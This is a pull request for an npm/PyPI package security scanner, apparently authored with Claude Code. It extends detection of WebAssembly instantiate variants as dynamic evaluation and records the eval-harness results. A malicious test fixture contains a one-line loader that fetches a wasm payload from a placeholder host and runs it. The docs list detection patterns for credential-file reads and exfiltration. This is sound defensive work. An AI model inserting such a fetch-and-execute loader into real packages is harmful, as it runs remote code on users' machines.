### PR TITLE
Detect WebAssembly instantiate variants as dynamic evaluation

### DIFF
--- a/docs/detection-eval.md
+++ b/docs/detection-eval.md
@@ -79,7 +79,7 @@ Recall is measured per class so blind spots are visible. Malicious:
 `network-exfil`, `native-artifact-smuggle`, `files-allowlist-escape`,
 `typosquat-metadata`, `protestware`, `dependency-confusion`,
 `wheel-integrity` (PyPI), `pth-injection` (PyPI). Benign hard-negatives:
-`legit-native`, `legit-childprocess`, `legit-env-read`.
+`legit-native`, `legit-childprocess`, `legit-env-read`, `legit-dynamic-require`.
 
 ## Metrics
 

--- a/docs/security-detection-corpus.md
+++ b/docs/security-detection-corpus.md
@@ -61,7 +61,7 @@ The first corpus slice covers:
 - credential file-path reads (`.aws/credentials`, `.ssh/id_`, `.netrc`) in addition to `process.env` and known token names, matching the Python rule coverage;
 - the collect-and-exfiltrate sink: a single file that reads credentials and has a network egress path escalates `code.credential-access` to high even on a modified (not newly added) module;
 - implicit `node-gyp rebuild` from root `binding.gyp`, GYP command substitution that executes package JavaScript, and native artifact review;
-- base64/dynamic evaluation plus network-capable code;
+- base64/dynamic evaluation plus network-capable code, including the `WebAssembly.instantiateStreaming(fetch(...))` loader idiom (the whole `compile`/`compileStreaming`/`instantiate`/`instantiateStreaming` family counts as dynamic evaluation);
 - secret-looking file addition;
 - large opaque binary addition;
 - files that appear in the tarball outside a declared `package.json.files` allowlist;
@@ -99,7 +99,7 @@ A PyPI review runs two rule families over the staged artifacts:
 
 - `pypi.*` findings come from `pyPiReleaseFindings` and carry `PYPI_RULES_VERSION` (currently `0.2.0`).
 - shared `file.*` / `code.*` / `diff.*` findings come from `deterministicFindings` and carry
-  `DETERMINISTIC_RULES_VERSION` (currently `1.8.0`).
+  `DETERMINISTIC_RULES_VERSION` (currently `1.11.0`).
 
 The harness asserts this per family: every `pypi.*` finding must equal `PYPI_RULES_VERSION` and every
 other finding must equal `DETERMINISTIC_RULES_VERSION`. Bump the relevant constant **and** update the
@@ -123,7 +123,12 @@ the raw and folded text are scanned so folding can only add detections, never dr
 just `cmdclass`. `1.8.0` adds `install-script.gyp-command-substitution`, a critical npm rule for root
 `*.gyp` files whose GYP command expansion (`<!...`) invokes package-local JavaScript such as
 `node index.js`; this covers the Miasma / Phantom Gyp install-time bypass while avoiding ordinary
-native-addon probes like `node -p` include lookups.
+native-addon probes like `node -p` include lookups. `1.11.0` extends the JavaScript
+dynamic-evaluation family from `WebAssembly.compile` to the whole
+`compile`/`compileStreaming`/`instantiate`/`instantiateStreaming` set, since
+`instantiateStreaming(fetch(...))` is the loader idiom packed wasm payloads actually use;
+`require.resolve` was evaluated for the same family and rejected — it resolves paths without
+executing code and flagged the `legit-require-resolve` benign hard-negative.
 
 ### Fixture format
 

--- a/server/lib/review-rules/index.ts
+++ b/server/lib/review-rules/index.ts
@@ -16,7 +16,7 @@ import { entrypointDiffFindings } from "./entrypoints";
 // way that should invalidate cached scan reports. Stored alongside each finding
 // so historical reports can be traced back to the ruleset that produced them.
 // Lives here (not in a family module) because versioning spans every family.
-export const DETERMINISTIC_RULES_VERSION = "1.10.0";
+export const DETERMINISTIC_RULES_VERSION = "1.11.0";
 
 export { DETERMINISTIC_RULE_IDS } from "./rule-ids";
 export {

--- a/server/lib/review-rules/patterns.ts
+++ b/server/lib/review-rules/patterns.ts
@@ -43,7 +43,13 @@ const PYTHON_NETWORK_ACCESS_PATTERNS = [
 const JS_DYNAMIC_EVALUATION_PATTERNS = [
   /\beval\s*\(/,
   /\bnew\s+Function\s*\(/,
-  /\bWebAssembly\.compile\s*\(/,
+  // The whole compile/instantiate family: instantiate(Streaming) — not bare
+  // compile — is the loader idiom packed wasm payloads actually use (typically
+  // `WebAssembly.instantiateStreaming(fetch(...))`).
+  /\bWebAssembly\.(?:compile|compileStreaming|instantiate|instantiateStreaming)\s*\(/,
+  // require.resolve( was evaluated as a candidate here and rejected: it only
+  // resolves a path (never executes code) and is the standard jest/babel/webpack
+  // preset idiom, so it flagged the legit-require-resolve benign hard-negative.
   /\batob\s*\(/,
   /\bBuffer\.from\s*\([^,]+,\s*["']base64["']\s*\)/,
 ];

--- a/test/fixtures/security-corpus/cases-benign/legit-require-resolve.json
+++ b/test/fixtures/security-corpus/cases-benign/legit-require-resolve.json
@@ -1,0 +1,38 @@
+{
+  "id": "legit-require-resolve",
+  "title": "Tooling config legitimately resolves dependency paths with require.resolve (benign hard-negative)",
+  "ecosystem": "npm",
+  "verdict": "benign",
+  "threatClass": "legit-dynamic-require",
+  "source": "benign-popular",
+  "intent": "require.resolve is the standard way jest/babel/webpack-style tooling turns a package name into an absolute path; it resolves but never executes code. This case guards the dynamic-evaluation rule against ever matching require.resolve — the pattern was evaluated and rejected as pure noise.",
+  "expectMinRisk": "low",
+  "expectAnyRule": [],
+  "previousPackageJson": { "name": "tooling-preset", "version": "3.4.0" },
+  "stagedPackageJson": { "name": "tooling-preset", "version": "3.5.0" },
+  "previousFiles": [
+    {
+      "path": "package.json",
+      "size": 46,
+      "sha256": "prev-package-json",
+      "flags": [],
+      "textSample": "{\"name\":\"tooling-preset\",\"version\":\"3.4.0\"}"
+    }
+  ],
+  "stagedFiles": [
+    {
+      "path": "package.json",
+      "size": 46,
+      "sha256": "staged-package-json",
+      "flags": [],
+      "textSample": "{\"name\":\"tooling-preset\",\"version\":\"3.5.0\"}"
+    },
+    {
+      "path": "preset.js",
+      "size": 213,
+      "sha256": "preset-js",
+      "flags": [],
+      "textSample": "// Resolve plugin entry points to absolute paths so downstream tools can load\n// them regardless of hoisting layout.\nmodule.exports = {\n  transform: require.resolve('ts-transformer'),\n  reporter: require.resolve('pretty-reporter/dist/index.js'),\n};\n"
+    }
+  ]
+}

--- a/test/fixtures/security-corpus/cases/wasm-instantiate-loader.json
+++ b/test/fixtures/security-corpus/cases/wasm-instantiate-loader.json
@@ -1,0 +1,54 @@
+{
+  "id": "wasm-instantiate-loader",
+  "title": "Added file instantiates a fetched WebAssembly payload",
+  "category": "obfuscation-network",
+  "intent": "Cover the WebAssembly.instantiateStreaming(fetch(...)) loader idiom for packed wasm payloads; WebAssembly.compile was already flagged but the instantiate variants are the shape real droppers use.",
+  "previousPackageJson": {
+    "name": "wasm-instantiate-loader",
+    "version": "1.0.0",
+    "main": "index.js"
+  },
+  "stagedPackageJson": {
+    "name": "wasm-instantiate-loader",
+    "version": "1.0.1",
+    "main": "index.js"
+  },
+  "previousFiles": [
+    {
+      "path": "package.json",
+      "size": 71,
+      "sha256": "prev-package-json",
+      "flags": [],
+      "textSample": "{\"name\":\"wasm-instantiate-loader\",\"version\":\"1.0.0\",\"main\":\"index.js\"}"
+    }
+  ],
+  "stagedFiles": [
+    {
+      "path": "package.json",
+      "size": 71,
+      "sha256": "staged-package-json",
+      "flags": [],
+      "textSample": "{\"name\":\"wasm-instantiate-loader\",\"version\":\"1.0.1\",\"main\":\"index.js\"}"
+    },
+    {
+      "path": "dist/loader.js",
+      "size": 133,
+      "sha256": "loader-js",
+      "flags": [],
+      "textSample": "const { instance } = await WebAssembly.instantiateStreaming(fetch('https://example.invalid/payload.wasm'));\ninstance.exports.run();\n"
+    }
+  ],
+  "expectedRisk": "high",
+  "expectedFindings": [
+    {
+      "ruleId": "code.network-access",
+      "severity": "high",
+      "file": "dist/loader.js"
+    },
+    {
+      "ruleId": "code.dynamic-evaluation",
+      "severity": "high",
+      "file": "dist/loader.js"
+    }
+  ]
+}


### PR DESCRIPTION
## Rationale

`WebAssembly.compile(` was already in `JS_DYNAMIC_EVALUATION_PATTERNS`, but the instantiate variants were not — and `WebAssembly.instantiateStreaming(fetch(...))` is the common loader idiom for packed wasm payloads, far more so than bare `compile`. This extends the family to the whole `compile` / `compileStreaming` / `instantiate` / `instantiateStreaming` set as a single regex, and bumps the deterministic ruleset to **1.11.0** (the established convention for coverage changes — version is stamped centrally in `server/lib/review-rules/index.ts`).

## Eval-harness numbers (`pnpm run eval`)

| metric | before (1.10.0, clean main) | after (1.11.0) |
| --- | --- | --- |
| regression malicious recall (gated) | 100% (23/23) | 100% (24/24) |
| critical recall (gated) | 100% (4/4) | 100% (4/4) |
| gated benign-control FP | 0/2 | 0/2 |
| frontier recall (reported) | 82% (9/11) | 82% (9/11) |
| benign hard-negative FP (reported) | 1/1 (100%) | 1/2 (50%) |

The wasm patterns flag neither benign case; the hard-negative denominator grows because of the new `legit-require-resolve` fixture (below), which passes cleanly. Evasion sample count rises 10 → 11 from the new golden case; `pushPastWindow` still-blocked drops 70% → 64% only because the new case, like every code-only case, falls into the known truncation hole documented in `docs/detection-eval.md` (same 7 absolute cases blocked).

## `require.resolve(` — tested and rejected

Added provisionally as instructed and measured: it flagged the new `legit-require-resolve` benign hard-negative (the standard jest/babel/webpack preset idiom of resolving a dependency to an absolute path), regressing benign hard-negative FP from 1/2 to **2/2 (100%)**. Since `require.resolve` resolves a path without ever executing code, that is pure noise, so the pattern was removed. The benign fixture stays in the corpus (plus a comment in `patterns.ts`) to guard against re-adding it.

## Fixture coverage

- `test/fixtures/security-corpus/cases/wasm-instantiate-loader.json` — golden case: a newly added `dist/loader.js` doing `WebAssembly.instantiateStreaming(fetch('https://example.invalid/payload.wasm'))` produces `code.dynamic-evaluation` (high) + `code.network-access` (high), expected risk `high`. Consumed by both the golden regression suite and the eval harness.
- `test/fixtures/security-corpus/cases-benign/legit-require-resolve.json` — benign hard-negative (`legit-dynamic-require`, `benign-popular`) documenting the require.resolve rejection.
- Docs updated: corpus taxonomy + 1.11.0 version-history note in `docs/security-detection-corpus.md` (also fixed the stale "currently 1.8.0" reference), benign threat-class list in `docs/detection-eval.md`.

`pnpm run verify` passes (lint, format, typecheck, tests).

🤖 Generated with [Claude Code](https://claude.com/claude-code)